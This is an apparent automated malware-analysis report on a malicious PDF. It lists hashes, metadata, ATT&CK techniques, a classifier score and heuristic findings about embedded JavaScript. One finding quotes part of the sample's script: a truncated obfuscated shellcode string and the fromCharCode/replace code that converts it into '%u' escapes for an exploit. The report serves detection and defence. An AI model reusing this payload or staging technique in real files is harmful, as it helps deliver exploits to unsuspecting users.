Malicious PDF — malware analysis report

Static analysis result for SHA-256 86581e9c31ca12c3…

MALICIOUS

PDF

Size: 481.5 KB
Created: 2010-04-29 12:20:06 +08:00
Authoring application: WPS Office 个人版 (via PDFlib 7.0.3 (C++/Win32))
First seen: 2026-05-10
MD5: 8e4d5834354c8fd012fcadc2093c0f26
SHA-1: 6271cb759e49dafb0350e9123b9db9bbd061e5c0
SHA-256: 86581e9c31ca12c3de8ed3f1e2c8e7308a4061e9a9d53a331f3ed4bedf0d0501
Risk score: 114

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript; T1203 Exploitation for Client Execution; T1566.001 Spearphishing Attachment

The sample is a PDF file containing embedded JavaScript that multiple heuristics flag as an exploit cluster. The JavaScript is likely used to download and execute a second-stage payload, a common malware delivery technique. The ML classifier strongly indicates the file is malicious.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9977

Heuristics (3)

  • JavaScript action (severity: low; 2 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical) PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched lines in script:
    var forme1 = "@2deb@8358@04c0@c933@088b@9090@3390@33f6@8bff@83f0@0cc6@fe8b@3366@66d2@168b@d632@1788@c683@8302@01c7@e983@e301@eb17@e8e9@ffce@ffff@9090@9090@632e@0001@9090@9090@9090@9090@e8bd@048f@9874@3bba@917d@bdbd@030b@7070@5e5e@c5a1@54f5@5a6a@b8b8@4848@4e4e@a229@7434@9894@eb60@3e4e@a9b5@be13@e863@0747@6a62@028b@83c6@28d4@a922@f828@7df6@c082@437f@e962@fca0@6a68@265e@999a@fd27@e26b@0558@877f@e66d@3279@5d45@a62d@f4af@98b8@c2c1@e63c@3871@b73c@2a1e@0a81@4e4d@2356@5aa6@5de5@edaa@89ec@d3a7@a2f2@122b@ …
    var asT = String.fromCharCode(37,117);
    var forme2 = forme1.replace(/@/g,asT);
  • Embedded JS stream (severity: low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: font_00_sfnt_off00001861.bin
Kind: pdf-font-stream
Source: PDF embedded font (sfnt) at offset 0x1861
Size: 51772 bytes
SHA-256: 175b09ff66440d54002858d1d9eb8bb658989ccbea100b745c9d92394f025231